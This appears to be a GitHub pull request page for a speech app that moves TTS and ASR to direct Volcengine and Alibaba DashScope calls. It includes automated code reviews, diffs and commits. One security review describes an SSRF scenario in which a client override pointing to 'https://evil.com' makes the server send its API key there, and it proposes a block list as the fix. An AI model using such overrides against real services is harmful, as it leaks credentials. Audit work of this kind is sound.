• Implemented _forward_volcengine_tts() for direct Volcengine API calls with custom payload format
• Implemented _forward_alibaba_tts() for WebSocket-based Alibaba DashScope TTS
• Added comprehensive error extraction and decoration for provider-specific error messages
• Replaced streaming response with direct response for better error handling
• Added helper functions for payload building, model/voice resolution, and parameter parsing
• Removed legacy Dify and Coze TTS streaming implementations

backend/app/api/tts.py

40. backend/app/api/asr.py ✨ Enhancement +613/-24

Alibaba Bailian DashScope ASR integration with realtime support

• Added support for Alibaba Bailian DashScope ASR with realtime WebSocket streaming
• Implemented _forward_aliyun_dashscope_transcription() for non-realtime ASR via chat API
• Implemented realtime ASR session management with AliyunRealtimeSession dataclass
• Added WebSocket connection handling with proper cleanup and error recovery
• Enhanced streaming endpoint to support Alibaba realtime ASR with audio buffering
• Added helper functions for URL building, credential resolution, and event parsing
• Improved WebSocket disconnect handling with fallback error reporting

backend/app/api/asr.py

41. backend/app/services/providers/registry.py ✨ Enhancement +225/-4

Local TTS voice catalogs and Alibaba ASR support

• Added local TTS voice catalog loading for Volcengine and Alibaba providers
• Implemented _load_local_tts_voices() to load voices from JSON files
• Implemented voice parsing for Alibaba and Volcengine formats with model filtering
• Added Alibaba NLS ASR provider validation and model listing
• Implemented model candidate resolution for Alibaba voice filtering
• Added voice description building from language and compatibility metadata

backend/app/services/providers/registry.py

42. backend/tests/test_tts_engine_relay.py 🧪 Tests +188/-0

Tests for TTS engine relay and payload building

• New test suite for TTS engine relay functions
• Tests for TTS input extraction from various formats
• Tests for API key resolution with override precedence
• Tests for Volcengine and Alibaba payload building
• Tests for model normalization and error decoration

backend/tests/test_tts_engine_relay.py

43. backend/tests/test_asr_aliyun_dashscope.py 🧪 Tests +112/-0

Tests for Alibaba DashScope ASR integration

• New test suite for Alibaba DashScope ASR functions
• Tests for URL building and credential resolution
• Tests for realtime WebSocket URL construction
• Tests for ASR text extraction from various response formats
• Tests for model resolution and event parsing

backend/tests/test_asr_aliyun_dashscope.py

44. backend/tests/test_provider_voices_tts.py 🧪 Tests +110/-0

Tests for provider voice catalog listing

• New test suite for provider voice listing
• Tests for local voice catalog loading for Volcengine and Alibaba
• Tests for model-based voice filtering for Alibaba
• Tests for unsupported provider handling

backend/tests/test_provider_voices_tts.py

45. backend/tests/test_provider_catalog_tts_defaults.py 🧪 Tests +43/-0

Tests for TTS provider catalog defaults

• New test suite for TTS provider catalog defaults
• Validates Volcengine uses official endpoint as default base URL
• Validates Alibaba uses DashScope endpoint with correct model defaults
• Validates model field options in provider catalog

backend/tests/test_provider_catalog_tts_defaults.py

46. backend/app/api/providers.py ✨ Enhancement +52/-23

Refactor provider field serialization with Alibaba-specific filtering

• Added ALIYUN_NLS_PROVIDER_ID constant for Alibaba NLS provider identification
• Extracted field serialization logic into _provider_field_to_dict() helper function
• Created _aliyun_nls_default_field_dicts() to return minimal field configuration (API key only)
 for Alibaba provider
• Introduced _resolve_provider_field_dicts() to conditionally filter provider fields, hiding
 OpenAI-style fields for Alibaba NLS

backend/app/api/providers.py

47. backend/tests/test_provider_catalog_aliyun_fields.py 🧪 Tests +76/-0

Add Alibaba provider field normalization tests

• New test file validating Alibaba NLS provider field normalization
• Tests that only apiKey field is exposed when OpenAI-style fields are present
• Verifies minimal field shape enforcement for Alibaba provider configuration

backend/tests/test_provider_catalog_aliyun_fields.py

48. backend/tests/test_asr_stream_disconnect.py 🧪 Tests +45/-0

Add ASR stream disconnect detection tests

• New test file for WebSocket disconnect detection in ASR streaming
• Tests _is_websocket_disconnect_message() for disconnect frame detection
• Tests _is_disconnect_receive_runtime_error() for runtime error message matching
• Validates that unrelated runtime errors are properly ignored

backend/tests/test_asr_stream_disconnect.py
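The two checks named above could be implemented along these lines. The ASGI message type `websocket.disconnect` is standard; the substring rule for the runtime error and the un-prefixed function names are assumptions about how the PR's helpers work.

```python
def is_websocket_disconnect_message(message: dict) -> bool:
    """True for the ASGI frame that signals the client has gone away."""
    return message.get("type") == "websocket.disconnect"


def is_disconnect_receive_runtime_error(exc: RuntimeError) -> bool:
    """True for the RuntimeError raised when receive() is called after a disconnect."""
    text = str(exc).lower()
    return "disconnect" in text and "receive" in text
```

Treating both signals as a normal end of stream lets the handler clean up the upstream session without logging a spurious failure.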

49. backend/app/services/providers/voices/alibaba.json ⚙️ Configuration changes +294/-0

Add Alibaba Bailian TTS voice catalog

• New static voice catalog for Alibaba Bailian TTS provider
• Contains 20 voice profiles with metadata (name, preview URL, model, voice ID, scenarios, language,
 bitrate, format)
• Supports cosyvoice-v1 model with Chinese and bilingual voice options

backend/app/services/providers/voices/alibaba.json

50. backend/config/providers.yaml ⚙️ Configuration changes +11/-18

Migrate TTS/ASR providers to official endpoints with field normalization

• Updated Volcengine TTS provider: changed base_url from https://unspeech.hyp3r.link/v1/ to
 https://openspeech.bytedance.com/api/v1/tts
• Updated Alibaba TTS provider: changed base_url to https://dashscope.aliyuncs.com and
 normalized model ID from alibaba/cosyvoice-v1 to cosyvoice-v1
• Updated Alibaba ASR provider: added engine_id: aliyun-nls-asr, removed baseUrl and model
 fields, kept only apiKey field
• Changed Alibaba ASR voice field type from select with options_source: voices to plain text
 type

backend/config/providers.yaml

51. backend/config/engines.yaml ⚙️ Configuration changes +27/-3

Add Alibaba Bailian ASR engine and update TTS endpoints

• Updated Volcengine TTS engine: changed base_url from https://unspeech.hyp3r.link/v1 to
 https://openspeech.bytedance.com/api/v1/tts
• Updated Alibaba TTS engine: changed base_url to https://dashscope.aliyuncs.com and model from
 alibaba/cosyvoice-v1 to cosyvoice-v1
• Added new aliyun-nls-asr engine with type aliyun_dashscope_asr, pointing to
 https://dashscope.aliyuncs.com
• Configured ASR defaults and parameters for Alibaba provider (VAD, ITN, region settings)

backend/config/engines.yaml

52. frontend/apps/desktop-tauri/src-tauri/tauri.conf.json ⚙️ Configuration changes +2/-0

Enable HTTPS scheme for Tauri desktop windows
• Added "useHttpsScheme": true to main window configuration
• Added "useHttpsScheme": true to settings window configuration
frontend/apps/desktop-tauri/src-tauri/tauri.conf.json

53. backend/pyproject.toml Dependencies +1/-1

Promote websockets to core dependency

• Moved websockets>=12.0 from optional dev dependencies to core dependencies
• Makes WebSocket support a required dependency for all installations

backend/pyproject.toml

54. .idea/whale-whisper.iml ⚙️ Configuration changes +8/-0

Add IDE module configuration

• New PyCharm/IntelliJ IDE module configuration file
• Defines Python module structure with inherited JDK and source folder settings

.idea/whale-whisper.iml

55. .idea/modules.xml ⚙️ Configuration changes +8/-0

Add IDE project module registry
• New IDE project module manager configuration
• Registers whale-whisper.iml module for the project
.idea/modules.xml

56. .idea/vcs.xml ⚙️ Configuration changes +7/-0

Add IDE Git version control mapping

• New IDE version control configuration
• Maps project root and airi submodule to Git version control

.idea/vcs.xml

57. .idea/misc.xml ⚙️ Configuration changes +4/-0

Add IDE project JDK configuration
• New IDE project settings configuration
• Specifies whale-whisper Python SDK as project JDK
.idea/misc.xml

58. .idea/inspectionProfiles/profiles_settings.xml ⚙️ Configuration changes +6/-0

Add IDE inspection profile settings
• New IDE inspection profiles settings
• Disables project-specific inspection profile in favor of default settings
.idea/inspectionProfiles/profiles_settings.xml

59. .idea/easycode.ignore ⚙️ Configuration changes +13/-0

Add EasyCode plugin ignore patterns

• New ignore patterns file for EasyCode IDE plugin
• Excludes common build artifacts, node modules, test files, and minified assets

.idea/easycode.ignore

60. CLAUDE.md 📝 Documentation +296/-0

Add comprehensive Claude Code development guide

• New comprehensive development guide for Claude Code integration
• Documents project overview, architecture, code standards, testing procedures, and common commands
• Includes environment setup instructions, project structure, and contribution guidelines
• Provides troubleshooting tips and resource references

CLAUDE.md

61. .idea/inspectionProfiles/Project_Default.xml Additional files +144/-0

...

.idea/inspectionProfiles/Project_Default.xml

62. backend/app/services/providers/voices/volcengine.json Additional files +3176/-0

...

backend/app/services/providers/voices/volcengine.json

63. frontend/apps/desktop-tauri/renderer/src/App.vue Additional files +0/-7

...

frontend/apps/desktop-tauri/renderer/src/App.vue

qodo-code-review · 2026-03-01T14:38:45Z

Code Review by Qodo

🐞 Bugs (3) 📘 Rule violations (0) 📎 Requirement gaps (0)

1. Dify/Coze TTS broken 🐞 Bug ✓ Correctness

Description

run_tts_engine no longer routes dify_tts/coze_tts to their dedicated implementations and
instead falls through to _build_unspeech_payload, which requires model and voice. Since
dify-tts/coze-tts are still configured without a model, these engines will now error (400) or
send incompatible payloads to their provider endpoints.

Code

backend/app/api/tts.py[R76-115]

 @router.post("/engines")
-async def run_tts_engine(request: EngineRunRequest) -> StreamingResponse:
-    engine_id = _resolve_engine_id(request.engine)
-    config = _get_engine_config(engine_id)
-    text = _coerce_text(request.data)
+async def run_tts_engine(request: EngineRunRequest) -> Response:
+    engine_id = _resolve_tts_engine_id(request.engine)
+    runtime_config = _get_tts_engine_config(engine_id)
+
+    text = _extract_tts_input(request.data)
     if not text:
         raise HTTPException(status_code=400, detail="Missing text input")

-    engine_type = (config.engine_type or "openai_compat").lower()
     overrides = request.config if isinstance(request.config, dict) else {}
+    api_key = _resolve_tts_api_key(runtime_config, overrides)
+    if not api_key:
+        raise HTTPException(status_code=400, detail="Missing apiKey for TTS provider")
+
+    if engine_id in VOLCENGINE_ENGINE_IDS:
+        return await _forward_volcengine_tts(
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
+            api_key=api_key,
+        )

-    if engine_type in {"dify_tts", "dify"}:
-        stream = await _stream_dify_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    if engine_id in ALIBABA_ENGINE_IDS:
+        return await _forward_alibaba_tts(
+            engine_id=engine_id,
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
+            api_key=api_key,
+        )

-    if engine_type in {"coze_tts", "coze"}:
-        stream = await _stream_coze_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    payload = _build_unspeech_payload(
+        engine_id=engine_id,
+        runtime_config=runtime_config,
+        text=text,
+        overrides=overrides,
+    )

-    base_url_override, api_key_override = _resolve_connection_overrides(overrides)
-    payload: Dict[str, Any] = {"model": config.model, "input": text}
-    payload.update(config.default_params)
-    payload.update(sanitize_config(overrides))
+    speech_path = runtime_config.paths.get("speech") if runtime_config.paths else None
+    url = runtime_config.base_url.rstrip("/") + normalize_path(speech_path or "/audio/speech")

Evidence

The TTS execution path now only special-cases Volcengine/Alibaba; everything else is forced through
_build_unspeech_payload, which hard-requires model and voice. But dify-tts and coze-tts
engine configs do not define a model, so they cannot satisfy the new required payload fields.

backend/app/api/tts.py[76-115]
backend/app/api/tts.py[376-389]
backend/config/engines.yaml[138-179]

Agent prompt

The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
`backend/app/api/tts.py` removed the dedicated Dify/Coze TTS execution paths, but `backend/config/engines.yaml` still defines `dify-tts` and `coze-tts` engines that don't have an OpenAI-style `model`/`voice` contract. As a result, requests to these engines will now fail with "Missing model" or send incompatible JSON to `/text-to-audio` / Coze endpoints.
## Issue Context
The PR focuses on direct backend routing for Volcengine/Alibaba. That change unintentionally (or implicitly) altered behavior for other TTS engine types.
## Fix Focus Areas
- backend/app/api/tts.py[76-115]
- backend/app/api/tts.py[376-415]
- backend/config/engines.yaml[138-179]
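
One possible shape for the fix, as a minimal sketch rather than the project's actual code: pick the handler by engine ID first (the direct Volcengine/Alibaba paths) and then by engine type, so that `dify_tts`/`coze_tts` engines never reach the OpenAI-style payload builder. The ID sets, the route names, and the `select_tts_route` helper are hypothetical; only the type aliases (`dify_tts`, `dify`, `coze_tts`, `coze`, `openai_compat`) come from the diff.

```python
from typing import Optional

# Placeholder ID sets (assumption): the real VOLCENGINE_ENGINE_IDS and
# ALIBABA_ENGINE_IDS live in backend/app/api/tts.py and may differ.
VOLCENGINE_ENGINE_IDS = frozenset({"volcengine-speech"})
ALIBABA_ENGINE_IDS = frozenset({"alibaba-example"})


def select_tts_route(engine_id: str, engine_type: Optional[str]) -> str:
    """Return the name of the handler that should serve this engine."""
    # Direct provider routing takes priority, as in the new code path.
    if engine_id in VOLCENGINE_ENGINE_IDS:
        return "volcengine_direct"
    if engine_id in ALIBABA_ENGINE_IDS:
        return "alibaba_direct"

    # Same defaulting as the line removed in the diff.
    normalized = (engine_type or "openai_compat").lower()
    if normalized in {"dify_tts", "dify"}:
        return "dify"
    if normalized in {"coze_tts", "coze"}:
        return "coze"

    # Only engines with an OpenAI-style model/voice contract end up here.
    return "openai_compat"
```

With this ordering, `select_tts_route("dify-tts", "dify_tts")` resolves to the Dify handler instead of falling through to the generic payload builder.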


2. Volcengine auth header typo 🐞 Bug ✓ Correctness

Description

The Volcengine forwarder sets Authorization: Bearer;{api_key} (semicolon) instead of the standard
Bearer format used elsewhere in the backend. This is very likely to cause authentication failures
for all Volcengine TTS requests.

Code

backend/app/api/tts.py[R583-587]

+    headers = {
+        "Content-Type": "application/json",
+        "Authorization": f"Bearer;{api_key}",
+    }
+    headers.update(runtime_config.headers)

Evidence
The Volcengine forwarder uses a different Authorization header format than both the generic TTS
relay and the ASR codepaths. This inconsistency strongly indicates a typo/regression in the new
Volcengine routing logic.
backend/app/api/tts.py[583-587]
backend/app/api/tts.py[117-120]
backend/app/api/asr.py[337-342]

Agent prompt

The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
Volcengine TTS forwarding sends `Authorization: Bearer;{api_key}` which is inconsistent with the rest of the backend (`Bearer {api_key}`) and is likely an authentication-breaking typo.
## Issue Context
This occurs only in the new direct Volcengine routing path.
## Fix Focus Areas
- backend/app/api/tts.py[574-616]
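
A small sketch of building the Authorization header in one helper, so the format each provider receives is explicit rather than embedded in an f-string inside a forwarder. The `build_auth_header` helper and its parameters are hypothetical. Which separator a given provider expects is an assumption here and should be confirmed against that provider's API documentation before either form is treated as a typo.

```python
from typing import Dict


def build_auth_header(
    api_key: str, scheme: str = "Bearer", separator: str = " "
) -> Dict[str, str]:
    """Build an Authorization header with an explicit scheme/credential separator."""
    if not api_key:
        raise ValueError("api_key must not be empty")
    return {"Authorization": f"{scheme}{separator}{api_key}"}


# Standard form used elsewhere in the backend, per the review.
standard = build_auth_header("example-key")

# Form currently sent by the Volcengine forwarder in the diff.
semicolon = build_auth_header("example-key", separator=";")
```

Keeping the separator as a named argument makes the difference between the two call sites reviewable at a glance.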


3. Volcengine health mismatch 🐞 Bug ⛯ Reliability

Description

volcengine-speech now uses the official provider base_url but still configures a /models
health path, while health checks always call base_url + health_path. This health check is no
longer aligned with the engine’s actual direct-routing behavior and may produce misleading unhealthy
results.

Code

backend/config/engines.yaml[R106-112]

     - id: volcengine-speech
       label: Volcengine
       type: openai_compat
-      base_url: https://unspeech.hyp3r.link/v1
+      base_url: https://openspeech.bytedance.com/api/v1/tts
       model: v1
       api_key_env: UNSPEECH_API_KEY
       paths:

Evidence

The health-check mechanism concatenates base_url with a (default) OpenAI-style path (/models).
After switching Volcengine to an official TTS endpoint base URL, this health strategy is no longer
obviously appropriate, especially since runtime requests bypass OpenAI-compatible semantics entirely
via the _forward_volcengine_tts path.

backend/config/engines.yaml[106-115]
backend/app/services/engines/health.py[24-27]
backend/app/api/tts.py[90-96]

Agent prompt

The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
After switching Volcengine to a direct provider base URL, the engine health check still calls `base_url + /models` (OpenAI-compat style). This may not reflect real Volcengine availability and can create false negatives.
## Issue Context
Health checks are used by `/tts/engines/{engine}/health` and rely on `paths.health`.
## Fix Focus Areas
- backend/config/engines.yaml[106-115]
- backend/app/services/engines/health.py[10-44]
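
To make the mismatch concrete, here is a minimal sketch of the concatenation described above. `build_health_url` is a hypothetical stand-in for whatever `backend/app/services/engines/health.py` does internally; only the two base URLs and the `/models` path come from the review.

```python
def build_health_url(base_url: str, health_path: str = "/models") -> str:
    """Join base_url and health_path as plain string concatenation."""
    path = health_path if health_path.startswith("/") else "/" + health_path
    return base_url.rstrip("/") + path


# Before the PR: an OpenAI-compatible relay, where /models is a natural probe.
old_url = build_health_url("https://unspeech.hyp3r.link/v1")
# -> "https://unspeech.hyp3r.link/v1/models"

# After the PR: the base URL is already the TTS endpoint itself.
new_url = build_health_url("https://openspeech.bytedance.com/api/v1/tts")
# -> "https://openspeech.bytedance.com/api/v1/tts/models"
```

The second URL appends `/models` to what is already a synthesis endpoint, which is why the review questions whether the probe still says anything about real availability.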


github-actions · 2026-03-01T14:43:47Z

Blocker (can’t start the diff-scoped review)

gh pr view / gh pr diff fail with: error connecting to api.github.com (no outbound network/DNS in this sandbox). curl https://github.com also fails (Could not resolve host), so I can’t fetch the metadata/diff for PR #36 (feat: migrate TTS providers to backend direct routing) or post review comments/labels.

What I can confirm from the local GitHub Actions event payload

PR #36 (base dev, head fix/tts-voice-flow) has 8862 additions, 992 deletions, 66 files changed → Size = XL (recommended label: size/XL).

Unblock options (pick one)

Enable DNS + HTTPS egress to api.github.com (and rerun), so I can execute the required gh pr diff/view/edit/review workflow.
Or paste the outputs of:
- gh pr diff 36 --repo datawhalechina/whale-whisper --color=never
- gh pr view 36 --repo datawhalechina/whale-whisper --json headRefOid,additions,deletions,changedFiles,files --jq '.headRefOid, .additions, .deletions, .changedFiles, (.files[].path)'

With that diff, I’ll produce diff-line-only inline comment commands (with exact path + line + concrete code fixes) and the final gh pr review summary body, plus XL split suggestions grounded in the actual changes.

github-actions

Code Review Summary

This PR migrates TTS/ASR providers from relying on the unspeech proxy to direct backend routing to Volcengine and Alibaba Cloud endpoints. The implementation is substantial (66 files, 8730+/992-) with solid test coverage for the new backend relay paths and frontend request builders. Two issues warrant attention before merge.

PR Size: XL

Issues Found

Category	Critical	High	Medium
Security	1	0	0
Error Handling	0	1	0
Hygiene	0	0	1

Detail

[SECURITY-VULNERABILITY] SSRF via user-controlled provider URLs — _resolve_volcengine_tts_url and _resolve_alibaba_tts_ws_url accept arbitrary URLs from the client-supplied config dict. A caller can redirect the backend to internal services; if server-side API keys are configured via env vars, those credentials leak to the attacker-controlled endpoint. See inline comment on tts.py:459.
[ERROR-SILENT] Voice catalog load errors silently cached — _load_local_tts_voices_cached catches Exception and returns []. Combined with @lru_cache, a transient read/parse failure is permanently cached as empty until process restart, with zero logging. See inline comment on registry.py:204.
[HYGIENE] .idea/ directory committed — 8 IDE-specific files (inspection profiles, module config, VCS mappings) are tracked. These should be added to .gitignore alongside .vscode/.
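
The voice-catalog item above can be illustrated with a short sketch, under the assumption that the catalog is a JSON list on disk. `functools.lru_cache` stores return values but not raised exceptions, so letting the cached function raise and handling the error in an uncached wrapper keeps a transient failure from being remembered as an empty list. The function names here are hypothetical and do not mirror `registry.py`.

```python
import json
import logging
from functools import lru_cache
from pathlib import Path
from typing import Any, Dict, List, Tuple

logger = logging.getLogger(__name__)


@lru_cache(maxsize=8)
def _read_voice_catalog(path: str) -> Tuple[Dict[str, Any], ...]:
    """Parse the catalog; errors propagate, so failed loads are never cached."""
    data = json.loads(Path(path).read_text(encoding="utf-8"))
    if not isinstance(data, list):
        raise ValueError("voice catalog must be a JSON list")
    return tuple(data)


def load_voices(path: str) -> List[Dict[str, Any]]:
    """Return the voices, or [] with a logged warning if loading fails."""
    try:
        return list(_read_voice_catalog(path))
    except (OSError, ValueError) as exc:
        # json.JSONDecodeError is a ValueError subclass, so parse errors land here.
        logger.warning("Failed to load voice catalog %s: %s", path, exc)
        return []
```

A later call with the same path retries the read, because only successful results are stored in the cache.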

Review Coverage

Automated review by Claude AI

backend/app/api/tts.py

backend/app/services/providers/registry.py

qodo-code-review · 2026-03-01T14:44:56Z

backend/app/api/tts.py

 @router.post("/engines")
-async def run_tts_engine(request: EngineRunRequest) -> StreamingResponse:
-    engine_id = _resolve_engine_id(request.engine)
-    config = _get_engine_config(engine_id)
-    text = _coerce_text(request.data)
+async def run_tts_engine(request: EngineRunRequest) -> Response:
+    engine_id = _resolve_tts_engine_id(request.engine)
+    runtime_config = _get_tts_engine_config(engine_id)
+
+    text = _extract_tts_input(request.data)
    if not text:
        raise HTTPException(status_code=400, detail="Missing text input")

-    engine_type = (config.engine_type or "openai_compat").lower()
    overrides = request.config if isinstance(request.config, dict) else {}
+    api_key = _resolve_tts_api_key(runtime_config, overrides)
+    if not api_key:
+        raise HTTPException(status_code=400, detail="Missing apiKey for TTS provider")
+
+    if engine_id in VOLCENGINE_ENGINE_IDS:
+        return await _forward_volcengine_tts(
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
+            api_key=api_key,
+        )

-    if engine_type in {"dify_tts", "dify"}:
-        stream = await _stream_dify_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    if engine_id in ALIBABA_ENGINE_IDS:
+        return await _forward_alibaba_tts(
+            engine_id=engine_id,
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
+            api_key=api_key,
+        )

-    if engine_type in {"coze_tts", "coze"}:
-        stream = await _stream_coze_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    payload = _build_unspeech_payload(
+        engine_id=engine_id,
+        runtime_config=runtime_config,
+        text=text,
+        overrides=overrides,
+    )

-    base_url_override, api_key_override = _resolve_connection_overrides(overrides)
-    payload: Dict[str, Any] = {"model": config.model, "input": text}
-    payload.update(config.default_params)
-    payload.update(sanitize_config(overrides))
+    speech_path = runtime_config.paths.get("speech") if runtime_config.paths else None
+    url = runtime_config.base_url.rstrip("/") + normalize_path(speech_path or "/audio/speech")


1. Dify/coze tts broken 🐞 Bug ✓ Correctness

run_tts_engine no longer routes dify_tts/coze_tts to their dedicated implementations and instead falls through to _build_unspeech_payload, which requires model and voice. Since dify-tts/coze-tts are still configured without a model, these engines will now error (400) or send incompatible payloads to their provider endpoints.

Agent Prompt

## Issue description
`backend/app/api/tts.py` removed the dedicated Dify/Coze TTS execution paths, but `backend/config/engines.yaml` still defines `dify-tts` and `coze-tts` engines that don't have an OpenAI-style `model`/`voice` contract. As a result, requests to these engines will now fail with "Missing model" or send incompatible JSON to `/text-to-audio` / Coze endpoints.
## Issue Context
The PR focuses on direct backend routing for Volcengine/Alibaba. That change unintentionally (or implicitly) altered behavior for other TTS engine types.
## Fix Focus Areas
- backend/app/api/tts.py[76-115]
- backend/app/api/tts.py[376-415]
- backend/config/engines.yaml[138-179]


qodo-code-review · 2026-03-01T14:44:56Z

backend/app/api/tts.py

+    headers = {
+        "Content-Type": "application/json",
+        "Authorization": f"Bearer;{api_key}",
+    }
+    headers.update(runtime_config.headers)


2. Volcengine auth header typo 🐞 Bug ✓ Correctness

The Volcengine forwarder sets Authorization: Bearer;{api_key} (semicolon) instead of the standard Bearer format used elsewhere in the backend. This is very likely to cause authentication failures for all Volcengine TTS requests.

Agent Prompt

## Issue description
Volcengine TTS forwarding sends `Authorization: Bearer;{api_key}` which is inconsistent with the rest of the backend (`Bearer {api_key}`) and is likely an authentication-breaking typo.
## Issue Context
This occurs only in the new direct Volcengine routing path.
## Fix Focus Areas
- backend/app/api/tts.py[574-616]


github-actions · 2026-03-01T15:52:29Z

backend/app/api/asr.py

+
+def _resolve_aliyun_dashscope_base_url(params: Dict[str, Any], config) -> str:
+    explicit_base = str(
+        _first_present(params, "base_url", "baseUrl", "dashscope_base_url", "dashscopeBaseUrl")


[SECURITY-VULNERABILITY] SSRF + credential leakage via unblocked dashscope_base_url / dashscopeBaseUrl override keys.

ASR_BLOCKED_CONFIG_KEYS blocks base_url and baseUrl, but _resolve_aliyun_dashscope_base_url also reads dashscope_base_url and dashscopeBaseUrl from the merged params. These keys are not in the block list, so a client can inject an arbitrary destination URL through the config override dict.

Attack scenario:

Client sends {"config": {"dashscopeBaseUrl": "https://evil.com"}} via the ASR endpoint

No dashscopeApiKey provided → server falls back to resolve_api_key(config.api_key_env) (reads DASHSCOPE_API_KEY env var)

Server POSTs to https://evil.com/compatible-mode/v1/chat/completions with Authorization: Bearer <real_api_key>

Attacker captures the DashScope API key

Suggested fix — add the extra keys to the block set:

ASR_BLOCKED_CONFIG_KEYS = frozenset(
    {
        "api_key",
        "apiKey",
        "base_url",
        "baseUrl",
        "dashscope_base_url",
        "dashscopeBaseUrl",
        "dashscope_api_key",
        "dashscopeApiKey",
        "engine",
        "filename",
        "file_name",
        "file",
        "content_type",
        "mime_type",
    }
)

Alternatively, _resolve_aliyun_dashscope_base_url should only read from config.base_url (server-side YAML config) and never from client-provided overrides.
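
Both options can be sketched together: drop URL-bearing keys from client overrides, and validate any base URL against a host allowlist before server-side credentials are attached. This is a minimal illustration, not the project's code. `URL_OVERRIDE_KEYS`, `ALLOWED_DASHSCOPE_HOSTS`, and both helper names are hypothetical, and the allowlist contains only the DashScope host named in this PR.

```python
from typing import Any, Dict
from urllib.parse import urlparse

# Hypothetical names; the key spellings are taken from the review comment.
URL_OVERRIDE_KEYS = frozenset(
    {"base_url", "baseUrl", "dashscope_base_url", "dashscopeBaseUrl"}
)
ALLOWED_DASHSCOPE_HOSTS = frozenset({"dashscope.aliyuncs.com"})


def strip_url_overrides(overrides: Dict[str, Any]) -> Dict[str, Any]:
    """Return a copy of client overrides without any URL-bearing keys."""
    return {k: v for k, v in overrides.items() if k not in URL_OVERRIDE_KEYS}


def is_allowed_base_url(url: str) -> bool:
    """Accept only https/wss URLs whose host is on the allowlist."""
    parsed = urlparse(url)
    return (
        parsed.scheme in {"https", "wss"}
        and parsed.hostname in ALLOWED_DASHSCOPE_HOSTS
    )
```

Checking `parsed.hostname` rather than doing a substring match matters here: a URL such as `https://dashscope.aliyuncs.com@evil.com` parses with host `evil.com` and is rejected.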

github-actions · 2026-03-01T15:52:43Z

backend/app/api/tts.py

+        async with ws_connect(
+            ws_url,
+            additional_headers={
+                "Authorization": api_key,


[LOGIC-BUG] Missing Bearer prefix in Alibaba TTS WebSocket Authorization header.

The DashScope WebSocket streaming synthesis API (/api-ws/v1/inference) expects Authorization: bearer <api_key>. This code sends the raw API key without the prefix, which will cause authentication to fail at runtime.

Compare with the ASR realtime code which correctly uses the prefix:

# asr.py:753 (correct)
"Authorization": f"Bearer {resolved['api_key']}",

Suggested fix:

additional_headers={
    "Authorization": f"Bearer {api_key}",
    "X-DashScope-DataInspection": "enable",
},

github-actions · 2026-03-01T15:52:56Z

backend/app/api/asr.py

+
+    model = ALIYUN_ASR_REALTIME_MODEL
+    if not model:
+        raise HTTPException(status_code=400, detail="Alibaba Bailian ASR missing model")


[LOGIC-BUG] Dead code — unreachable model validation.

ALIYUN_ASR_REALTIME_MODEL is a non-empty constant ("qwen3-asr-flash-realtime"), so if not model: on line 516 can never be True. This check is dead code and may mask a real intent (e.g., the model should perhaps come from config or overrides rather than be hardcoded).

Suggested fix — remove the dead branch:

def _resolve_aliyun_dashscope_credentials(config, overrides):
    ...
    model = ALIYUN_ASR_REALTIME_MODEL
    return {
        "params": params,
        "api_key": api_key,
        "model": model,
        "base_url": _resolve_aliyun_dashscope_base_url(params, config),
    }

github-actions · 2026-03-01T15:54:13Z

backend/app/api/asr.py

+    try:
+        await session.ws.close()
+    except Exception:
+        pass


[ERROR-SILENT] _close_aliyun_realtime_session swallows all exceptions without logging.

Two bare except Exception: pass blocks discard errors silently. While cleanup code often ignores errors, the project constitution requires logging — unexpected failures during teardown (e.g., hung reader task, broken pipe) become invisible when debugging production issues.

Suggested fix — add logger.debug so the errors are at least traceable:

async def _close_aliyun_realtime_session(session: AliyunRealtimeSession) -> None:
    if session.reader_task is not None:
        session.reader_task.cancel()
        try:
            await session.reader_task
        except asyncio.CancelledError:
            pass
        except Exception:
            logger.debug("Error awaiting Aliyun reader task during cleanup", exc_info=True)
    try:
        await session.ws.close()
    except Exception:
        logger.debug("Error closing Aliyun WebSocket during cleanup", exc_info=True)

github-actions

Code Review Summary

This is a large, ambitious PR that migrates TTS/ASR from third-party relay services to direct API integration with Volcengine and Alibaba DashScope, adds real-time streaming ASR, incremental TTS during LLM streaming, and microphone UI controls. The code is generally well-structured with good error handling patterns and comprehensive test coverage for utility functions. However, there is a critical SSRF vulnerability that must be fixed before merge.

PR Size: XL

(8862 additions, 992 deletions, 66 files)

Issues Found

Category	Critical	High	Medium	Low
Security	1	—	—	—
Logic	—	1	1	—
Error Handling	—	—	1	—

Critical

[SECURITY-VULNERABILITY] backend/app/api/asr.py:492 — SSRF + credential leakage via unblocked dashscope_base_url/dashscopeBaseUrl override keys. Client-provided config overrides can redirect server-side HTTP/WebSocket requests to arbitrary URLs, leaking the server's DashScope API key. The ASR_BLOCKED_CONFIG_KEYS block list must be extended to cover these alias keys.

High

[LOGIC-BUG] backend/app/api/tts.py:709 — Missing Bearer prefix in Alibaba TTS WebSocket Authorization header. The DashScope streaming synthesis API expects Authorization: bearer <key>, but the code sends the raw key. The ASR code at asr.py:753 correctly uses f"Bearer {api_key}". This will cause Alibaba CosyVoice TTS to fail with an auth error in production.

Medium

[LOGIC-BUG] backend/app/api/asr.py:515-517 — Dead code: model = ALIYUN_ASR_REALTIME_MODEL followed by if not model: is unreachable since the constant is a non-empty string. May mask intent to make the model configurable.
[ERROR-SILENT] backend/app/api/asr.py:832-838 — _close_aliyun_realtime_session has two except Exception: pass blocks that silently discard errors during cleanup. Should at least use logger.debug for production traceability.

Additional Note

The .idea/ directory (JetBrains IDE config) is included in the diff. As noted in the PR checklist, this should be removed from the commit and added to .gitignore.

Review Coverage

Automated review by Claude AI

Kiritogu added 12 commits February 13, 2026 15:19

fix(tts): serialize chunk requests and centralize voice config

220368e

fix(tts): fallback dashscope compatible-mode and improve errors

3014403

Revert "fix(tts): fallback dashscope compatible-mode and improve errors"

39fcebc

This reverts commit 3014403.

feat(tts): align streaming flow with airi and harden errors

c987aec

chore: commit all current local changes (exclude airi)

736306a

refactor(tts): move synthesis to frontend direct provider calls

a3681db

feat(asr): align aliyun nls transcription flow with airi

7157a12

